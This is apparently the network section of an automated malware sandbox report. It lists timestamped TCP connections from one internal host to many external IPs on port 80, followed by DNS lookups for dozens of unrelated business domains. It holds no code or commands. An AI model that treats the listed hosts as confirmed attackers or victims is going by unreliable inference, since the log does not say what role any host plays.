                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.413140059 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.413186073 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.483310938 CEST4984280192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.555790901 CEST4984380192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.592133045 CEST4984480192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.645880938 CEST4984580192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.659728050 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.659761906 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.659781933 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.659801960 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.659821033 CEST8049843208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.660044909 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.660095930 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.660139084 CEST4984380192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.660619020 CEST4984380192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.764374971 CEST8049843208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.765317917 CEST8049843208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.765446901 CEST4984380192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.766232967 CEST8049843208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.766298056 CEST4984380192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.780227900 CEST4984380192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.794378042 CEST8049844154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.795268059 CEST4984480192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.801166058 CEST80498453.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.802639961 CEST4984580192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.825968027 CEST4984480192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.826129913 CEST4984580192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.828910112 CEST4984680192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.884131908 CEST8049843208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.932985067 CEST8049846208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.933104038 CEST4984680192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.939340115 CEST4984680192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.981209040 CEST80498453.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.981252909 CEST80498453.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.981343031 CEST4984580192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.981379986 CEST4984580192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.982438087 CEST4984580192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.028601885 CEST8049844154.203.14.100192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.028661013 CEST4984780192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.028696060 CEST4984480192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.045377970 CEST8049846208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.050771952 CEST8049846208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.051420927 CEST8049846208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.051569939 CEST4984680192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.060760021 CEST4984680192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.137268066 CEST80498453.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.164747000 CEST8049846208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.184051037 CEST80498473.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.184171915 CEST4984780192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.206345081 CEST4982880192.168.2.6104.21.88.198
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.217601061 CEST4984780192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.223117113 CEST8049828104.21.88.198192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.228283882 CEST4982880192.168.2.6104.21.88.198
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.229996920 CEST4982880192.168.2.6104.21.88.198
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.246673107 CEST8049828104.21.88.198192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.281550884 CEST804980680.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.282047033 CEST4980680192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.307463884 CEST4984880192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.315140009 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.315220118 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.316102982 CEST4984980192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.324280024 CEST8049848188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.324455976 CEST4984880192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.329751968 CEST4984880192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.346592903 CEST8049848188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.355169058 CEST8049848188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.358249903 CEST4984880192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.359890938 CEST4984880192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.372894049 CEST80498473.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.372934103 CEST80498473.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.373079062 CEST4984780192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.374551058 CEST4984780192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.380412102 CEST8049848188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.380496025 CEST4984880192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.388633013 CEST8049828104.21.88.198192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.388676882 CEST8049828104.21.88.198192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.388699055 CEST8049828104.21.88.198192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.388776064 CEST4982880192.168.2.6104.21.88.198
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.388813019 CEST4982880192.168.2.6104.21.88.198
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.522769928 CEST8049849170.82.174.30192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.522903919 CEST4984980192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.529469967 CEST80498473.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.540575981 CEST4984980192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.541865110 CEST4985080192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.552706003 CEST804980270.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.554313898 CEST4980280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.561646938 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.561697006 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.561723948 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.561748981 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.561789036 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.561871052 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.561927080 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.661860943 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.662267923 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.707734108 CEST8049850103.224.182.241192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.707828045 CEST4985080192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.710163116 CEST4985080192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.710207939 CEST4985180192.168.2.613.224.103.24
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.720969915 CEST804985113.224.103.24192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.721421003 CEST4985180192.168.2.613.224.103.24
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.722968102 CEST4985180192.168.2.613.224.103.24
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.733711958 CEST804985113.224.103.24192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.734565973 CEST804985113.224.103.24192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.734677076 CEST4985180192.168.2.613.224.103.24
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.747318983 CEST8049849170.82.174.30192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.759485006 CEST4985280192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.760421038 CEST4985180192.168.2.613.224.103.24
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.771126032 CEST804985113.224.103.24192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.771249056 CEST804985113.224.103.24192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.771302938 CEST4985180192.168.2.613.224.103.24
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.797677994 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.797723055 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.797750950 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.797777891 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.797804117 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.797888041 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.797923088 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.863178015 CEST8049852192.252.154.18192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.863336086 CEST4985280192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.881701946 CEST4985280192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.891104937 CEST4985380192.168.2.6162.43.120.128
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.908057928 CEST8049850103.224.182.241192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.908097982 CEST8049850103.224.182.241192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.908195972 CEST4985080192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.908243895 CEST4985080192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.914444923 CEST4985080192.168.2.6103.224.182.241
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.940805912 CEST4983280192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.982364893 CEST8049832135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.982486010 CEST4983280192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.983062029 CEST4983280192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.988254070 CEST8049852192.252.154.18192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.990647078 CEST8049852192.252.154.18192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.991514921 CEST4985280192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.996817112 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.996851921 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.996872902 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.996893883 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.996915102 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.996937990 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.997030020 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.997095108 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.024548054 CEST8049832135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.025121927 CEST8049832135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.025207996 CEST4983280192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.034210920 CEST8049849170.82.174.30192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.034589052 CEST4984980192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.084310055 CEST8049850103.224.182.241192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.165978909 CEST8049853162.43.120.128192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.166191101 CEST4985380192.168.2.6162.43.120.128
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.181941986 CEST804981762.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.182018042 CEST4981780192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192253113 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192507982 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192543983 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192569971 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192589998 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192594051 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192610025 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192629099 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192630053 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192650080 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192662954 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.192687035 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.230752945 CEST4983280192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.231863976 CEST4985380192.168.2.6162.43.120.128
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.233021975 CEST4984980192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.257659912 CEST4985480192.168.2.6198.100.146.220
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.268826008 CEST8049832135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.268954039 CEST4983280192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.372078896 CEST4985580192.168.2.6193.166.255.171
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.387943983 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.387976885 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.387998104 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.388016939 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.388036966 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.388056040 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.388075113 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.388093948 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.388242960 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.388307095 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.439627886 CEST8049849170.82.174.30192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.507874966 CEST8049853162.43.120.128192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.509021044 CEST8049853162.43.120.128192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.509124041 CEST4985380192.168.2.6162.43.120.128
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.552367926 CEST4985680192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.581469059 CEST8049849170.82.174.30192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.581698895 CEST4984980192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585457087 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585494041 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585514069 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585532904 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585552931 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585572004 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585591078 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585612059 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585638046 CEST804983839.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585681915 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.585741043 CEST4983880192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.627753973 CEST4985380192.168.2.6162.43.120.128
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.639529943 CEST4985880192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.639899015 CEST4985980192.168.2.6137.118.26.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.639997959 CEST4986080192.168.2.6104.21.23.9
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.640506983 CEST4985780192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.656748056 CEST8049860104.21.23.9192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.656860113 CEST4986080192.168.2.6104.21.23.9
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.657485008 CEST4986080192.168.2.6104.21.23.9
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.658646107 CEST8049858192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.658791065 CEST4985880192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.659358025 CEST4985880192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.674169064 CEST8049860104.21.23.9192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.678486109 CEST8049858192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.678831100 CEST8049858192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.040344000 CEST192.168.2.68.8.8.80x54c8Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.042977095 CEST192.168.2.68.8.8.80x22cbStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.044095039 CEST192.168.2.68.8.8.80xf287Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.046359062 CEST192.168.2.68.8.8.80x1549Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.048954010 CEST192.168.2.68.8.8.80x62d2Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.051187038 CEST192.168.2.68.8.8.80x3632Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.053177118 CEST192.168.2.68.8.8.80x351Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.054933071 CEST192.168.2.68.8.8.80xd7c8Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.056207895 CEST192.168.2.68.8.8.80xe3e5Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.056785107 CEST192.168.2.68.8.8.80x156aStandard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.349390030 CEST192.168.2.68.8.8.80x3d58Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.350517035 CEST192.168.2.68.8.8.80x4e96Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.351850033 CEST192.168.2.68.8.8.80x592dStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.645153999 CEST192.168.2.68.8.8.80x551dStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.681046963 CEST192.168.2.68.8.8.80xf5fbStandard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.684910059 CEST192.168.2.68.8.8.80x3783Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.085095882 CEST192.168.2.68.8.8.80x1549Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.269249916 CEST192.168.2.68.8.8.80x5d6bStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.269509077 CEST192.168.2.68.8.8.80x3a44Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.270015001 CEST192.168.2.68.8.8.80x96deStandard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.271894932 CEST192.168.2.68.8.8.80xc76cStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.353262901 CEST192.168.2.68.8.8.80x7429Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.370585918 CEST192.168.2.68.8.8.80x8322Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.442770958 CEST192.168.2.68.8.8.80xeb8dStandard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.527076006 CEST192.168.2.68.8.8.80x7464Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.530561924 CEST192.168.2.68.8.8.80xb17Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.782392025 CEST192.168.2.68.8.8.80x6886Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.784540892 CEST192.168.2.68.8.8.80xc54cStandard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.784717083 CEST192.168.2.68.8.8.80xa873Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.972609043 CEST192.168.2.68.8.8.80x3887Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
